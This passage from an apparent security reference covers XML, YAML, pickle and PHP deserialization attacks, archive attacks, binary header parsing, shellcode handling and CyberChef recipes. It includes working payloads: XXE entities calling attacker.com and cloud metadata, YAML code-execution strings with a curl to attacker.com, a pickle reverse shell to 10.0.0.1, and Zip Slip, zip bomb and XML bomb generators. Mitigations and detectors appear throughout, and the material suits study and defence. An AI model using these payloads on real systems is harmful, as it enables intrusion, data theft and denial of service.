<root>&xxe;</root>"""

xxe_ssrf = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>"""

xxe_oob = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root>&send;</root>"""

# Billion Laughs (XML bomb) — exponential entity expansion
xml_bomb = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>"""
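# Each level multiplies by 10: lol9 is 10^8 copies of the 3-byte "lol", ~300 MB
# (the classic variant with one more level reaches ~3 GB)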

# SAFE XML parsing in Python
import defusedxml.ElementTree as ET  # pip install defusedxml
# or with stdlib:
from xml.etree.ElementTree import XMLParser
# Disable entities manually — defusedxml is strongly preferred
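
When defusedxml is not available, one stdlib-only precaution is to refuse any document that declares a DOCTYPE, since every payload above depends on one. A sketch using the `xml.parsers.expat` handler hook (`reject_doctype` and `DTDForbidden` are hypothetical names; this is a pre-check, not a full replacement for defusedxml):

```python
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def reject_doctype(xml_text: str) -> None:
    """Parse xml_text with Expat and raise DTDForbidden on any DOCTYPE."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at the start of the DOCTYPE, before entity declarations
        # in the internal subset are processed.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)
```

Documents that pass can then go to the regular parser; legitimate inputs that rely on a DTD will be rejected too, which is usually acceptable for API payloads.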

YAML (arbitrary code execution)

import yaml

# DANGEROUS: yaml.load() with an unsafe Loader (the implicit default before PyYAML 5.1) executes arbitrary Python
dangerous_yaml = """
!!python/object/apply:os.system
args: ['id']
"""
# yaml.load(dangerous_yaml, Loader=yaml.UnsafeLoader)  # EXECUTES 'id'

# SAFE: Always use SafeLoader
safe = yaml.safe_load("key: value")

# Exploit payloads:
yaml_rce_payloads = [
    "!!python/object/apply:os.system ['whoami']",
    "!!python/object/apply:subprocess.check_output [['id']]",
    "!!python/object/new:os.system ['curl http://attacker.com']",
    "!!python/object/apply:builtins.eval ['__import__(\"os\").system(\"id\")']",
]

# Ruby YAML (Psych) RCE:
# --- !!ruby/object:Gem::Installer
# --- i: x
# --- !!ruby/object:Gem::SpecFetcher
# ---   i: y
# --- !!ruby/object:Gem::Requirement
# ---   requirements:
# ---     !!ruby/object:Gem::Package::TarReader
# ---     io: &1 !!ruby/object:Net::BufferedIO
# ---       io: &1 !!ruby/object:Gem::Package::TarReader::Entry
# ---          read: 0
# ---          header: "abc"
# ---       debug_output: &1 !!ruby/object:Net::WriteAdapter
# ---          socket: &1 !!ruby/object:Gem::RequestSet
# ---              sets: !!ruby/object:Net::WriteAdapter
# ---                  socket: !ruby/module 'Kernel'
# ---                  method_id: :system
# ---              git_set: id
# ---          method_id: :resolve

Python pickle (arbitrary code execution)

import pickle
import os

# NEVER unpickle untrusted data — equivalent to eval()

# RCE via pickle:
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
print(payload)
# Unpickling this runs 'id'

# More sophisticated: reverse shell via pickle
class ReverseShell:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (
            ['bash', '-c', 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'],
        ))

# Detection: look for these opcodes in pickle data
# \x80 = PROTO
# c = GLOBAL (c__builtin__\neval\n -> dangerous)
# R = REDUCE (calls the callable)
# ( = MARK

def is_pickle_dangerous(data: bytes) -> bool:
    """Heuristic check for dangerous pickle opcodes."""
    dangerous_modules = [b'os', b'subprocess', b'builtins', b'nt',
                         b'posix', b'commands', b'sys', b'importlib']
    for mod in dangerous_modules:
        if mod in data:
            return True
    return False

# Safe alternative: use json, msgpack, or protobuf
# If pickle is required, sign the data with HMAC when dumping and verify the signature before unpickling:
import hmac, hashlib
def safe_pickle_dump(obj, key: bytes) -> tuple[bytes, bytes]:
    data = pickle.dumps(obj)
    sig = hmac.new(key, data, hashlib.sha256).digest()
    return data, sig

def safe_pickle_load(data: bytes, sig: bytes, key: bytes):
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("Pickle signature verification failed")
    return pickle.loads(data)
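
The substring heuristic above flags any payload containing bytes like "os" or "sys", and HMAC signing only helps when both ends share a key. A third option, described in the Python pickle documentation, is to subclass `pickle.Unpickler` and restrict which globals may be resolved. A sketch along those lines (the allowlist contents are an illustrative choice):

```python
import builtins
import io
import pickle

# Only these builtins may be looked up by name during unpickling.
SAFE_BUILTINS = {'range', 'complex', 'set', 'frozenset', 'slice'}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == 'builtins' and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Everything else (os.system, subprocess.Popen, ...) is refused
        # before the callable is ever resolved or invoked.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads(), but only allowlisted globals can be resolved."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers, strings, and numbers never go through `find_class`, so ordinary data still loads; a `__reduce__` gadget fails at the lookup step.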

PHP serialize/unserialize

# PHP serialization format:
# s:5:"hello";                -> string(5) "hello"
# i:42;                       -> int 42
# b:1;                        -> bool true
# a:2:{s:1:"a";i:1;s:1:"b";i:2;}  -> array("a"=>1, "b"=>2)
# O:4:"User":1:{s:4:"name";s:5:"admin";}  -> User object

# PHP Object Injection: if unserialize() is called on user input,
# attacker can instantiate arbitrary classes and trigger __wakeup(),
# __destruct(), __toString() magic methods

# Python tool to craft PHP serialized payloads:
def php_serialize_string(s: str) -> str:
    # PHP string lengths count bytes, not characters
    return f's:{len(s.encode("utf-8"))}:"{s}";'

def php_serialize_object(class_name: str, properties: dict) -> str:
    props = ''
    for key, value in properties.items():
        props += php_serialize_string(key)
        if isinstance(value, str):
            props += php_serialize_string(value)
        elif isinstance(value, int):
            props += f'i:{value};'
    return f'O:{len(class_name.encode("utf-8"))}:"{class_name}":{len(properties)}:{{{props}}}'

# Forge admin object
payload = php_serialize_object("User", {"role": "admin", "id": 1})
# O:4:"User":2:{s:4:"role";s:5:"admin";s:2:"id";i:1;}

# Type juggling via loose comparison:
# "0e12345" == "0e99999" is TRUE in PHP (both are 0 in scientific notation)
# Exploit: find MD5 hash starting with "0e" followed by only digits
# MD5("240610708") = "0e462097431906509019562988736854" -> equals "0" in loose comparison
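
Checking whether a digest is a "magic hash" is a simple pattern match: a zero mantissa, an `e`, then digits only. A sketch that also reproduces the MD5 example above (`is_magic_hash` is a hypothetical name):

```python
import hashlib
import re

# Zero mantissa, 'e', then decimal digits only: PHP reads this as 0 * 10^n.
MAGIC_HASH = re.compile(r'0+e\d+')


def is_magic_hash(hex_digest: str) -> bool:
    """True if PHP's loose comparison would treat the digest as numeric zero."""
    return MAGIC_HASH.fullmatch(hex_digest) is not None


digest = hashlib.md5(b"240610708").hexdigest()
print(digest, is_magic_hash(digest))
```

On the PHP side the fix is strict comparison (`===`) or `hash_equals()`, which compare the strings byte for byte.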

13. Compression Security

gzip analysis

import gzip
import struct

# Compress / decompress
data = b"A" * 10000
compressed = gzip.compress(data)
decompressed = gzip.decompress(compressed)

# Parse gzip header (RFC 1952)
def parse_gzip_header(data: bytes) -> dict:
    if data[:2] != b'\x1f\x8b':
        raise ValueError("Not a gzip file")
    method = data[2]        # 8 = deflate
    flags = data[3]
    mtime = struct.unpack('<I', data[4:8])[0]
    return {
        'magic': data[:2].hex(),
        'method': 'deflate' if method == 8 else f'unknown({method})',
        'flags': f'{flags:08b}',
        'ftext': bool(flags & 1),
        'fhcrc': bool(flags & 2),
        'fextra': bool(flags & 4),
        'fname': bool(flags & 8),
        'fcomment': bool(flags & 16),
        'mtime': mtime,
    }
# Analyze gzip file
file suspicious.gz
gzip -l suspicious.gz           # list compression ratio
gzip -d -c suspicious.gz        # decompress to stdout
zcat suspicious.gz              # same as above

# Detect gzip by magic bytes
xxd suspicious.bin | head -1    # look for 1f8b

ZIP analysis and attacks

import zipfile
import os

# List contents
with zipfile.ZipFile('archive.zip', 'r') as zf:
    for info in zf.infolist():
        print(f"{info.filename:40} {info.file_size:>10} -> {info.compress_size:>10} "
              f"{'encrypted' if info.flag_bits & 0x1 else ''}")

# --- ZIP path traversal (Zip Slip) ---
# Malicious zip contains: ../../etc/cron.d/evil
# When extracted naively, writes outside target directory

def safe_extract(zip_path: str, dest: str) -> None:
    """Extract ZIP safely, preventing path traversal."""
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for member in zf.infolist():
            member_path = os.path.realpath(os.path.join(dest, member.filename))
            if not member_path.startswith(dest + os.sep) and member_path != dest:
                raise ValueError(f"Path traversal detected: {member.filename}")
            zf.extract(member, dest)

# --- Detect path traversal in ZIP ---
def check_zip_traversal(zip_path: str) -> list[str]:
    dangerous = []
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for name in zf.namelist():
            if name.startswith('/') or '..' in name:
                dangerous.append(name)
    return dangerous

# --- Create Zip Slip payload ---
def create_zip_slip(output: str, target_path: str, content: bytes) -> None:
    """Create a ZIP with path traversal payload. Authorized testing only."""
    with zipfile.ZipFile(output, 'w') as zf:
        zf.writestr(target_path, content)

# create_zip_slip('evil.zip', '../../../../tmp/evil.sh', b'#!/bin/bash\nid > /tmp/pwned\n')

ZIP bomb (decompression bomb)

# --- Nested ZIP bomb ---
# 42.zip: 42KB compressed -> 4.5 PB decompressed (nested ZIPs)
# Single-layer bomb:

def detect_zip_bomb(zip_path: str, ratio_threshold: int = 100,
                     size_threshold: int = 1_000_000_000) -> bool:
    """Detect potential ZIP bomb by compression ratio."""
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for info in zf.infolist():
            if info.compress_size > 0:
                ratio = info.file_size / info.compress_size
                if ratio > ratio_threshold or info.file_size > size_threshold:
                    return True
            elif info.file_size > 0:
                return True  # zero compressed size but non-zero file size
    return False

# Create a simple zip bomb (for testing decompression limits)
def create_zip_bomb(output: str, uncompressed_size: int = 10_000_000) -> None:
    """Create a single-layer zip bomb. Testing only."""
    with zipfile.ZipFile(output, 'w', zipfile.ZIP_DEFLATED) as zf:
        # Highly compressible data
        zf.writestr('bomb.txt', b'\x00' * uncompressed_size)
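
The ratio check relies on sizes declared in the archive's own headers, which a crafted file can misstate. A complementary approach is to cap the number of bytes actually produced while decompressing. A sketch of that idea (`read_member_capped` and the 100 MB default are illustrative choices):

```python
import zipfile


def read_member_capped(zf: zipfile.ZipFile, name: str,
                       limit: int = 100_000_000) -> bytes:
    """Decompress one member in chunks, aborting once limit bytes are exceeded."""
    chunks = []
    total = 0
    with zf.open(name) as src:
        while chunk := src.read(64 * 1024):
            total += len(chunk)
            if total > limit:
                raise ValueError(f"{name}: decompressed size exceeds {limit} bytes")
            chunks.append(chunk)
    return b''.join(chunks)
```

Because the data is read in 64 KB chunks, memory use at the moment of abort stays close to the limit.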

tar analysis and attacks

# List tar contents (check for path traversal; -t without -v so each line starts with the name)
tar -tf archive.tar | grep -E '(^|/)\.\.(/|$)|^/'

# Safe extraction (GNU tar strips leading / by default)
tar --no-same-owner --no-same-permissions -xvf archive.tar -C /tmp/safe/

# Check for symlink and hard-link entries
tar -tvf archive.tar | grep -E '^[lh]'
import tarfile

# Detect dangerous tar entries
def check_tar_safety(tar_path: str) -> list[str]:
    issues = []
    with tarfile.open(tar_path) as tf:
        for member in tf.getmembers():
            # Path traversal
            if member.name.startswith('/') or '..' in member.name:
                issues.append(f"PATH_TRAVERSAL: {member.name}")
            # Symlink outside extraction directory
            if member.issym() or member.islnk():
                issues.append(f"SYMLINK: {member.name} -> {member.linkname}")
            # Setuid/setgid bits
            if member.mode & 0o4000 or member.mode & 0o2000:
                issues.append(f"SETUID/SETGID: {member.name} mode={oct(member.mode)}")
            # Device files
            if member.isdev():
                issues.append(f"DEVICE_FILE: {member.name}")
    return issues

# Safe extraction (filter parameter: Python 3.12+, also backported to security releases of 3.8-3.11)
# tarfile.open(path).extractall(dest, filter='data')
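
On interpreters without the `filter` parameter, member paths and link targets can be resolved against the destination before extracting. A sketch of such a pre-check (`unsafe_tar_members` is a hypothetical name; it assumes symlink targets are relative to the link's directory and hard-link targets to the archive root):

```python
import os
import tarfile


def unsafe_tar_members(tf: tarfile.TarFile, dest: str) -> list[str]:
    """Names of members whose path or link target resolves outside dest."""
    root = os.path.realpath(dest)

    def escapes(path: str) -> bool:
        resolved = os.path.realpath(os.path.join(root, path))
        return os.path.commonpath([root, resolved]) != root

    bad = []
    for m in tf.getmembers():
        if escapes(m.name):
            bad.append(m.name)
        elif m.issym() and escapes(os.path.join(os.path.dirname(m.name), m.linkname)):
            bad.append(m.name)
        elif m.islnk() and escapes(m.linkname):
            bad.append(m.name)
    return bad
```

An empty result means no entry points outside `dest`; setuid bits and device files still need the separate checks shown earlier.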

14. Binary & Struct Manipulation

struct packing and unpacking

import struct

# Format characters:
# < little-endian    > big-endian    ! network (big-endian)    = native order, standard sizes    @ native order, size and alignment (default)
# b/B signed/unsigned byte (1)
# h/H signed/unsigned short (2)
# i/I signed/unsigned int (4)
# l/L signed/unsigned long (4)
# q/Q signed/unsigned long long (8)
# f   float (4)       d   double (8)
# s   char[] (bytes)  p   pascal string
# x   padding byte

# Pack values into binary
packed = struct.pack('<IHH', 0xdeadbeef, 0x1234, 0x5678)
print(packed.hex())   # efbeadde34127856 (little-endian)

# Unpack binary to values
values = struct.unpack('<IHH', packed)
print([hex(v) for v in values])  # ['0xdeadbeef', '0x1234', '0x5678']

# Network byte order (big-endian) for IP/TCP
import socket
ip_packed = socket.inet_aton("192.168.1.1")   # b'\xc0\xa8\x01\x01'
ip_int = struct.unpack('!I', ip_packed)[0]     # 3232235777
ip_str = socket.inet_ntoa(struct.pack('!I', ip_int))  # '192.168.1.1'

# Pack a C struct
# struct header { uint32_t magic; uint16_t version; uint16_t flags; uint32_t size; };
header = struct.pack('<IHHI', 0x7f454c46, 2, 1, 0x1000)

# Unpack with named fields (using namedtuple)
from collections import namedtuple
Header = namedtuple('Header', 'magic version flags size')
parsed = Header._make(struct.unpack('<IHHI', header))
print(f"Magic: {parsed.magic:#x}, Version: {parsed.version}")
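
The byte-order prefix also controls padding, which matters when a format string is meant to mirror an on-disk or on-wire layout. A short sketch of the difference, using `struct.calcsize` and a precompiled `struct.Struct` (the native size depends on the platform, so only the packed size is fixed):

```python
import struct

# '<' (like '>' and '!') uses standard sizes with no alignment padding.
packed_size = struct.calcsize('<BI')    # 1 + 4 = 5 bytes

# '@' (the default) follows the platform's C ABI; on common platforms the
# uint32 is aligned to 4 bytes, giving 8. Treat this value as platform-dependent.
native_size = struct.calcsize('@BI')

# A precompiled Struct avoids re-parsing the format on every call.
record = struct.Struct('<BI')
raw = record.pack(0x01, 0xdeadbeef)
tag, value = record.unpack(raw)
print(packed_size, native_size, raw.hex(), hex(value))
```

For file formats and network protocols an explicit `<`, `>`, or `!` prefix is the safer default, since the layout then does not change between machines.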

Endianness

# Little-endian: least significant byte first (x86, ARM default)
# Big-endian: most significant byte first (network order, MIPS, SPARC)

value = 0xdeadbeef

# Manual conversion
le_bytes = value.to_bytes(4, 'little')   # b'\xef\xbe\xad\xde'
be_bytes = value.to_bytes(4, 'big')      # b'\xde\xad\xbe\xef'

# Swap endianness
def swap_endian_32(val: int) -> int:
    return struct.unpack('<I', struct.pack('>I', val))[0]

def swap_endian_16(val: int) -> int:
    return struct.unpack('<H', struct.pack('>H', val))[0]

# Detect endianness of a binary
def detect_endianness(data: bytes, offset: int, expected: int) -> str:
    """Check if value at offset matches expected in LE or BE."""
    le_val = struct.unpack_from('<I', data, offset)[0]
    be_val = struct.unpack_from('>I', data, offset)[0]
    if le_val == expected:
        return 'little-endian'
    elif be_val == expected:
        return 'big-endian'
    return 'unknown'

# Python int methods
val = int.from_bytes(b'\xef\xbe\xad\xde', 'little')   # 0xdeadbeef
val = int.from_bytes(b'\xde\xad\xbe\xef', 'big')       # 0xdeadbeef

ELF header parsing

import struct
from collections import namedtuple

def parse_elf_header(data: bytes) -> dict:
    """Parse ELF file header."""
    if data[:4] != b'\x7fELF':
        raise ValueError("Not an ELF file")

    ei_class = data[4]      # 1=32-bit, 2=64-bit
    ei_data = data[5]       # 1=LE, 2=BE
    ei_version = data[6]    # 1=current
    ei_osabi = data[7]      # 0=SYSV, 3=Linux, etc.

    endian = '<' if ei_data == 1 else '>'
    bits = 32 if ei_class == 1 else 64

    if bits == 64:
        # e_type(2) e_machine(2) e_version(4) e_entry(8) e_phoff(8) e_shoff(8)
        # e_flags(4) e_ehsize(2) e_phentsize(2) e_phnum(2) e_shentsize(2)
        # e_shnum(2) e_shstrndx(2)
        fmt = f'{endian}HHIQQQIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
    else:
        fmt = f'{endian}HHIIIIIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields

    ELF_TYPES = {0: 'ET_NONE', 1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
    MACHINES = {0x3: 'x86', 0x3E: 'x86_64', 0x28: 'ARM', 0xB7: 'AArch64',
                0x08: 'MIPS', 0xF3: 'RISC-V'}

    return {
        'class': f'{bits}-bit',
        'endian': 'little' if ei_data == 1 else 'big',
        'type': ELF_TYPES.get(e_type, f'0x{e_type:x}'),
        'machine': MACHINES.get(e_machine, f'0x{e_machine:x}'),
        'entry_point': f'0x{e_entry:x}',
        'ph_offset': e_phoff,
        'ph_count': e_phnum,
        'sh_offset': e_shoff,
        'sh_count': e_shnum,
    }

# Usage:
# with open('/bin/ls', 'rb') as f:
#     info = parse_elf_header(f.read(64))
#     for k, v in info.items():
#         print(f"{k}: {v}")
# Quick ELF analysis
readelf -h /bin/ls            # full header
readelf -l /bin/ls            # program headers (segments)
readelf -S /bin/ls            # section headers
readelf -d /bin/ls            # dynamic section (libraries)
readelf -s /bin/ls            # symbol table
objdump -d /bin/ls | head -50 # disassembly

# Check for security features
checksec --file=/bin/ls       # RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH

PE header parsing

import struct

def parse_pe_header(data: bytes) -> dict:
    """Parse PE (Windows executable) header."""
    if data[:2] != b'MZ':
        raise ValueError("Not a PE file")

    # e_lfanew: offset to PE signature (at offset 0x3C)
    pe_offset = struct.unpack_from('<I', data, 0x3C)[0]

    if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
        raise ValueError("Invalid PE signature")

    # COFF header (20 bytes after PE signature)
    coff_offset = pe_offset + 4
    machine, num_sections, timestamp, sym_table, num_symbols, \
    opt_header_size, characteristics = struct.unpack_from('<HHIIIHH', data, coff_offset)

    MACHINES = {0x14c: 'x86', 0x8664: 'x86_64', 0xAA64: 'ARM64'}

    # Optional header magic
    opt_offset = coff_offset + 20
    opt_magic = struct.unpack_from('<H', data, opt_offset)[0]
    pe_type = 'PE32+' if opt_magic == 0x20b else 'PE32'

    # Entry point and image base
    if pe_type == 'PE32+':
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<Q', data, opt_offset + 24)[0]
    else:
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<I', data, opt_offset + 28)[0]

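    import datetime
    try:
        # utcfromtimestamp() is deprecated since Python 3.12; build an aware UTC datetime
        compile_time = datetime.datetime.fromtimestamp(
            timestamp, datetime.timezone.utc).isoformat()
    except (OSError, OverflowError, ValueError):
        compile_time = f"raw: {timestamp}"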

    return {
        'type': pe_type,
        'machine': MACHINES.get(machine, f'0x{machine:x}'),
        'sections': num_sections,
        'compile_time': compile_time,
        'entry_point_rva': f'0x{entry_rva:x}',
        'image_base': f'0x{image_base:x}',
        'characteristics': f'0x{characteristics:x}',
        'is_dll': bool(characteristics & 0x2000),
        'is_exe': bool(characteristics & 0x0002),
    }

# Usage:
# with open('malware.exe', 'rb') as f:
#     info = parse_pe_header(f.read(1024))

Shellcode extraction and analysis

# Extract shellcode from various formats

def shellcode_from_c_array(c_code: str) -> bytes:
    """Parse C-style shellcode: unsigned char buf[] = {0x6a,...};"""
    import re
    hex_vals = re.findall(r'0x([0-9a-fA-F]{1,2})', c_code)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_from_escaped(escaped: str) -> bytes:
    """Parse \\x escape format: \\x6a\\x02\\x58"""
    import re
    hex_vals = re.findall(r'\\x([0-9a-fA-F]{2})', escaped)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_to_c_array(data: bytes, var_name: str = "buf") -> str:
    """Convert bytes to C array format."""
    hex_vals = ', '.join(f'0x{b:02x}' for b in data)
    return f'unsigned char {var_name}[] = {{{hex_vals}}};'

def shellcode_to_python(data: bytes) -> str:
    """Convert bytes to Python bytes literal."""
    return 'shellcode = b"' + ''.join(f'\\x{b:02x}' for b in data) + '"'

# Null byte detection (important for buffer overflow exploits)
def check_bad_chars(shellcode: bytes, bad_chars: bytes = b'\x00') -> list[int]:
    """Find positions of bad characters in shellcode."""
    positions = []
    for i, b in enumerate(shellcode):
        if b in bad_chars:
            positions.append(i)
    return positions

# Test pattern for bad-character discovery: send every byte value, then check which ones arrive mangled
ALL_BAD_CHARS = bytes(range(256))

# Extract shellcode from binary at specific offset
dd if=payload.bin bs=1 skip=1024 count=256 2>/dev/null | xxd -p | tr -d '\n'

# Disassemble shellcode
echo -ne '\x6a\x02\x58\x99\x48\x89\xd7\x48\x31\xf6\x0f\x05' | ndisasm -b 64 -

# Test shellcode (DANGEROUS — sandbox only)
# gcc -z execstack -o test test.c && ./test

15. CyberChef Reference

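CyberChef is a browser-based data manipulation tool, billed as "The Cyber Swiss Army Knife." Operations run client-side, so input data stays in the browser unless a recipe uses an explicitly network-facing operation such as HTTP request or DNS over HTTPS. Source: github.com/gchq/CyberChef (34k+ stars).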

Key features

Feature                 Description
Drag-and-drop recipes   Chain operations visually
Auto Bake               Real-time output as input/recipe changes
Magic                   Auto-detect encoding and suggest decode steps
Breakpoints             Step through recipe stages to inspect intermediate data
File support            Handle files up to ~2 GB
URL sharing             Share complete recipes via URL parameters
Client-side             No data sent to any server

Most-used operations for security work

Category      Operations
Encoding      To/From Base64, Base32, Base58, Base85, Hex, Decimal, Binary, Octal, Braille, Morse
URL/HTML      URL Encode/Decode, HTML Entity Encode/Decode
Crypto        AES/DES/3DES/Blowfish/RC4 Encrypt/Decrypt, XOR, ROT13, ROT47, Vigenere
Hashing       MD5, SHA-1, SHA-256, SHA-512, SHA-3, HMAC, bcrypt, scrypt, NTLM
Compression   Gunzip, Gzip, Zip, Bzip2, Raw Inflate/Deflate, Zlib
Data format   Parse JSON, XML, CSV, protobuf, MessagePack, BSON
Networking    Parse IP, Parse URI, DNS over HTTPS, HTTP request, Defang URL/IP
Analysis      Entropy, Frequency distribution, Detect file type, Strings, Hexdump
Code          JavaScript/PHP/XML Beautify/Minify, Disassemble x86, Parse ASN.1
Visual        Render Image, Play Media, Render Markdown
Forensics     Extract files (binwalk-style), Parse TLS, Parse X.509, Windows Filetime
Flow          Fork, Merge, Register, Conditional Jump, Label, Comment

Useful CyberChef recipes (bookmark these)

Decode multi-layer obfuscation:

From_Base64 -> Gunzip -> From_Hex -> XOR({'key':'secret'})
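
For scripting the same chain outside the browser, a rough Python equivalent is sketched below. It assumes the XOR key is applied as raw UTF-8 bytes and repeats across the data; decode_layers and xor_bytes are illustrative names, not CyberChef APIs.

```python
import base64
import gzip
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def decode_layers(blob: str, key: bytes) -> bytes:
    """Base64 -> gunzip -> hex -> XOR, mirroring the recipe order."""
    compressed = base64.b64decode(blob)
    hex_text = gzip.decompress(compressed).decode('ascii')
    return xor_bytes(bytes.fromhex(hex_text), key)

# Build a sample by applying the layers in reverse, then peel them off again
plain = b'whoami'
layered = base64.b64encode(
    gzip.compress(xor_bytes(plain, b'secret').hex().encode())
).decode()
print(decode_layers(layered, b'secret'))  # b'whoami'
```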

Extract IOCs from text:

Extract_IP_addresses -> Defang_IP_Addresses

Decode PowerShell -EncodedCommand:

From_Base64 -> Decode_text('UTF-16LE')
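
The same decode is two calls in Python, because -EncodedCommand expects Base64 over UTF-16LE text. A minimal sketch with illustrative function names:

```python
import base64

def decode_powershell_encoded(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE)."""
    return base64.b64decode(b64).decode('utf-16-le')

def encode_powershell_command(command: str) -> str:
    """Inverse operation, useful for building test samples."""
    return base64.b64encode(command.encode('utf-16-le')).decode('ascii')

print(decode_powershell_encoded('ZABpAHIA'))  # dir
```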

Analyze suspicious file:

Detect_File_Type -> Entropy -> Strings
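
The Entropy and Strings steps are easy to approximate locally. The sketch below computes Shannon entropy in bits per byte and pulls printable ASCII runs; the 4-character minimum is an assumed default, and file type detection is not covered.

```python
import math
import re
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())

def extract_strings(data: bytes, min_len: int = 4) -> list[bytes]:
    """Runs of printable ASCII at least min_len bytes long."""
    return re.findall(rb'[\x20-\x7e]{%d,}' % min_len, data)

sample = b'\x00\x01hello\x00ab\x00world!'
print(extract_strings(sample))  # [b'hello', b'world!']
```

As a rule of thumb, values close to 8.0 suggest compressed or encrypted content, while plain text usually sits well below that.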

JWT decode:

JWT_Decode

Timestamp conversion:

From_UNIX_Timestamp -> To_ISO_8601
Windows_Filetime_to_UNIX -> From_UNIX_Timestamp
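
Both conversions reduce to simple arithmetic. Windows FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC, so subtracting the epoch offset and dividing by 10,000,000 gives Unix seconds. A sketch with illustrative function names:

```python
from datetime import datetime, timezone

# FILETIME value that corresponds to 1970-01-01T00:00:00Z
FILETIME_UNIX_EPOCH = 116_444_736_000_000_000

def filetime_to_unix(filetime: int) -> float:
    """Convert Windows FILETIME (100 ns ticks since 1601) to Unix seconds."""
    return (filetime - FILETIME_UNIX_EPOCH) / 10_000_000

def unix_to_iso(ts: float) -> str:
    """Render Unix seconds as an ISO 8601 string in UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()

print(unix_to_iso(filetime_to_unix(116_444_736_000_000_000)))
# 1970-01-01T00:00:00+00:00
```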

Defang indicators for safe sharing:

Defang_URL -> Defang_IP_Addresses
# Converts http://evil.com -> hxxp[://]evil[.]com
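
For bulk reports it can be handy to defang in a script. The sketch below reproduces the output style shown above for http/https URLs and IPv4 addresses only; it is an approximation, not CyberChef's implementation, and the function names are illustrative.

```python
import re

def defang_url(url: str) -> str:
    """http://evil.com -> hxxp[://]evil[.]com"""
    out = re.sub(r'^http', 'hxxp', url, flags=re.IGNORECASE)
    out = out.replace('://', '[://]')
    return out.replace('.', '[.]')

def defang_ip(ip: str) -> str:
    """10.0.0.1 -> 10[.]0[.]0[.]1"""
    return ip.replace('.', '[.]')

def refang(text: str) -> str:
    """Reverse the defanging for analysis tooling."""
    out = text.replace('[://]', '://').replace('[.]', '.')
    return re.sub(r'^hxxp', 'http', out, flags=re.IGNORECASE)

print(defang_url('http://evil.com'))  # hxxp[://]evil[.]com
```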

CyberChef from the command line

# Self-host CyberChef (the build needs npm packages; the result runs fully offline)
git clone https://github.com/gchq/CyberChef.git
cd CyberChef && npm install && npx grunt prod
# Open build/prod/index.html in browser

# Or use Docker (the image serves on container port 80)
docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

# Node.js API (for automation)
# npm install cyberchef
# const chef = require("cyberchef");
# chef.bake("input", [chef.toBase64]);   // pass the operation itself, not the result of calling it

Appendix: Quick Conversion Table

From    To      Python                                                 Bash
String  Base64  base64.b64encode(s.encode())                           echo -n "s" | base64
Base64  String  base64.b64decode(b).decode()                           echo "b" | base64 -d
String  Hex     s.encode().hex()                                       echo -n "s" | xxd -p
Hex     String  bytes.fromhex(h).decode()                              echo "h" | xxd -r -p
